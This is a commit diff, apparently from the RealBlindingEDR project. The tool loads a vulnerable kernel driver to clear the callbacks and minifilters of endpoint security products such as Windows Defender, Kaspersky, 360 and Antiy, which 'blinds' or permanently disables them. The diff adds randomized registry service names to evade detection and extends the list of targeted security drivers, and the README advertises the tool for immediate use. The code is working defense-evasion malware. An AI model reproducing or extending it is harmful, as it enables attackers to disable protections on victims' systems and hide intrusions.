update

Author: myzxcg

README.md

@@ -8,7 +8,7 @@ If you want to understand the implementation principle, you can refer to the ana
 
 For immediate utilization, this update is released:
 
-**Supports blinding/permanent shutdown: 360 Security Guard, 360 Enterprise Edition, Tianqing V10, Tencent Computer Manager, Tinder/Tinder Enterprise Edition, Kaspersky Enterprise Edition, AsiaInfo EDR, Windows Defender.**
+**Supports blinding/permanent shutdown: 360 Security Guard, 360 Enterprise Edition, Tianqing V10, Tencent Computer Manager, Tinder/Tinder Enterprise Edition, Kaspersky Endpoint Security, AsiaInfo EDR, Windows Defender, AnTian Zhijia.**
 
 **Note:** If you have other EDR products that need to be blinded, you can send me the installation package and I will implement it according to the situation.
 

README.zh_CN.md

@@ -6,11 +6,11 @@
 
 为了便于直接利用，发布此更新：
 
-**支持致盲/永久关闭：360 安全卫士、360 企业版、天擎V10、腾讯电脑管家、火绒/火绒企业版、卡巴斯基企业版、亚信EDR、Windows Defender。**
+**支持致盲/永久关闭：360 安全卫士、360 企业版、天擎V10、腾讯电脑管家、火绒/火绒企业版、卡巴斯基企业版、亚信EDR、Windows Defender、安天智甲**
 
 **注：** 如果你有其他需要致盲的EDR产品可以发我安装包，我会根据情况实现。
 
-**当前已在64位的 Windows 7/10/11、Windows Server 2008R2/2012R2/2016/2019/2022 完成测试。如果你发现在某个版本有问题，可通过issue 反馈，我会进行适配。**
+**当前已在64位的 Windows 7/10/11、Windows Server 2008R2/2012R2/2016/2019/2022 完成测试。如果你发现在某个版本有问题，可通过issue 反馈。**
 
 
 ## 简介

RealBlindingEDR/RealBlindingEDR/RealBlindingEDR.cpp

@@ -5,10 +5,11 @@ DWORD dwMajor = 0;
 DWORD dwMinorVersion = 0;
 DWORD dwBuild = 0;
 INT64 EDRIntance[500] = { 0 };
+TCHAR* RandomName = NULL;
 BOOL LoadDriver() {
 	HKEY hKey;
 	HKEY hsubkey;
-	if (!RegOpenKeyExW(HKEY_LOCAL_MACHINE, L"System\\CurrentControlSet", 0, 2u, &hKey) && !RegCreateKeyW(hKey, L"RealBlindingEDR", &hsubkey)) {
+	if (!RegOpenKeyExW(HKEY_LOCAL_MACHINE, L"System\\CurrentControlSet", 0, 2u, &hKey) && !RegCreateKeyW(hKey, RandomName, &hsubkey)) {
 		CHAR* pdata = (CHAR*)calloc(1024, 1);
 		if (pdata == NULL) return FALSE;
 		memcpy(pdata, "\\??\\", strlen("\\??\\"));
@@ -25,16 +26,14 @@ BOOL LoadDriver() {
 		}
 
 		if (!RegOpenKeyExW(HKEY_LOCAL_MACHINE, L"System\\CurrentControlSet\\services", 0, 2u, &hKey)) {
-			RegCreateKeyW(hKey, L"RealBlindingEDR", &hsubkey);
+			RegCreateKeyW(hKey, RandomName, &hsubkey);
 		}
 		else {
 			printf("Step3 Error\n");
 			return FALSE;
 		}
 		RegCloseKey(hKey);
 
-		INT errcode;
-
 		HMODULE hMoudle = LoadLibraryA("ntdll.dll");
 		if (hMoudle == NULL) {
 			printf("Step4 Error\n");
@@ -52,8 +51,10 @@ BOOL LoadDriver() {
 		}
 
 		UNICODE_STRING szSymbolicLink;
-		RtlInitUnicodeString(&szSymbolicLink, (wchar_t*)L"\\Registry\\Machine\\System\\CurrentControlSet\\RealBlindingEDR");
-		errcode = NtLoadDriver(&szSymbolicLink);
+		TCHAR LinkPath[100] = L"\\Registry\\Machine\\System\\CurrentControlSet\\";
+		lstrcat(LinkPath, RandomName);
+		RtlInitUnicodeString(&szSymbolicLink, LinkPath);
+		INT errcode = NtLoadDriver(&szSymbolicLink);
 		if (errcode >= 0)
 		{
 			return TRUE;
@@ -92,7 +93,9 @@ VOID UnloadDrive() {
 
 	RtlInitUnicodeStringPtr RtlInitUnicodeString = (RtlInitUnicodeStringPtr)GetProcAddress(hMoudle, "RtlInitUnicodeString");
 	UNICODE_STRING szSymbolicLink;
-	RtlInitUnicodeString(&szSymbolicLink, (wchar_t*)L"\\Registry\\Machine\\System\\CurrentControlSet\\RealBlindingEDR");
+	TCHAR LinkPath[100] = L"\\Registry\\Machine\\System\\CurrentControlSet\\";
+	lstrcat(LinkPath, RandomName);
+	RtlInitUnicodeString(&szSymbolicLink, LinkPath);
 	NtUnLoadDriverPtr NtUnLoadDriver = (NtUnLoadDriverPtr)GetProcAddress(hMoudle, "NtUnloadDriver");
 
 	int errcode = NtUnLoadDriver(&szSymbolicLink);
@@ -105,7 +108,7 @@ VOID UnloadDrive() {
 	}
 }
 BOOL InitialDriver() {
-	//win7 加载此驱动崩溃，和后面代码逻辑无关
+	//win7 加载此驱动崩溃，和后面代码逻辑无关
 	if (Driver_Type == 1) {
 		hDevice = CreateFile(L"\\\\.\\EchoDrv", GENERIC_WRITE | GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
 		if (hDevice == INVALID_HANDLE_VALUE) {
@@ -260,7 +263,6 @@ INT64 GetFuncAddress(CHAR* ModuleName, CHAR* FuncName) {
 	return (INT64)KBase + Offset;
 }
 
-
 INT64 GetPspNotifyRoutineArray(CHAR* KernelCallbackRegFunc) {
 
 	INT64 PsSetCallbacksNotifyRoutineAddress = GetFuncAddress((CHAR*)"ntoskrnl.exe", KernelCallbackRegFunc);
@@ -553,7 +555,7 @@ VOID RemoveObRegisterCallbacks(INT64 PsProcessTypeAddr, INT flag) {
 		CHAR* DriverName2 = GetDriverName(EDRPostOperation);
 		if (DriverName2 != NULL) {
 			if (IsEDR(DriverName2)) {
-				//清除回调
+				//清除回调
 				DriverWriteMemery(data, (VOID*)(Flink + 48), 8);
 				if (flag == 1) {
 					printf("Process PreOperation: %s [Clear]\n", DriverName2);
@@ -945,6 +947,23 @@ VOID ClearMiniFilterCallback() {
 
 }
 
+VOID GenerateRandomName() {
+	srand((UINT)time(NULL));
+
+	INT length = rand() % 4 + 7;
+	TCHAR charset[] = L"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
+	RandomName = (TCHAR*)calloc(length*2 + 12,1);
+	if (RandomName) {
+		for (INT i = 0; i < length; ++i) {
+			INT index = rand() % (INT)(lstrlen(charset) - 1);
+			RandomName[i] = charset[index];
+		}
+	}
+	else {
+		printf("Random Error!\n");
+		ExitProcess(0);
+	}
+}
 int main(int argc, char* argv[])
 {
 	printf(" _______               __  ______  __   _               __  _               ________ ______  _______     \n");
@@ -961,6 +980,7 @@ int main(int argc, char* argv[])
 	DrivePath = argv[1];
 	Driver_Type = atoi(argv[2]);
 
+	GenerateRandomName();
 	HINSTANCE hinst = LoadLibraryA("ntdll.dll");
 	if (hinst == NULL) return FALSE;
 	NTPROC proc = (NTPROC)GetProcAddress(hinst, "RtlGetNtVersionNumbers");

RealBlindingEDR/RealBlindingEDR/RealBlindingEDR.h

@@ -2,6 +2,7 @@
 #include<stdio.h>
 #include<winternl.h>
 #include<psapi.h>
+#include <time.h>
 #pragma comment(lib,"ntdll.lib")
 
 /*
@@ -17,14 +18,15 @@ CHAR* DrivePath = NULL;
 
 //Set the driver name to be cleared
 CONST CHAR* AVDriver[] = {
-	"klflt.sys","klhk.sys","klif.sys","klupd_KES-21-9_arkmon.sys","KLIF.KES-21-9.sys","klbackupflt.KES-21-9.sys",
+	"klflt.sys","klhk.sys","klif.sys","klupd_KES-21-9_arkmon.sys","KLIF.KES-21-9.sys","klbackupflt.KES-21-9.sys","klids.sys","klupd_klif_arkmon.sys",
 	"QaxNfDrv.sys","QKBaseChain64.sys","QKNetFilter.sys","QKSecureIO.sys","QesEngEx.sys","QkHelp64.sys","qmnetmonw64.sys",
 	"QMUdisk64_ev.sys","QQSysMonX64_EV.sys","TAOKernelEx64_ev.sys","TFsFltX64_ev.sys","TAOAcceleratorEx64_ev.sys","QQSysMonX64.sys","TFsFlt.sys",
 	"sysdiag_win10.sys","sysdiag.sys",
 	"360AvFlt.sys",
 	"360qpesv64.sys","360AntiSteal64.sys","360AntiSteal.sys","360qpesv.sys","360FsFlt.sys","360Box64.sys","360netmon.sys","360AntiHacker64.sys","360Hvm64.sys","360qpesv64.sys","360AntiHijack64.sys","360AntiExploit64.sys","DsArk64.sys","360Sensor64.sys","DsArk.sys", 
 	"WdFilter.sys","MpKslDrv.sys","mpsdrv.sys","WdNisDrv.sys","win32k.sys",
 	"TmPreFilter.sys","TmXPFlt.sys",
+	"AHipsFilter.sys","AHipsFilter64.sys","GuardKrnl.sys","GuardKrnl64.sys","GuardKrnlXP64.sys","protectdrv.sys","protectdrv64.sys","AntiyUSB.sys","AntiyUSB64.sys","AHipsXP.sys","AHipsXP64.sys","AtAuxiliary.sys","AtAuxiliary64.sys","TrustSrv.sys","TrustSrv64.sys",
 	NULL
 };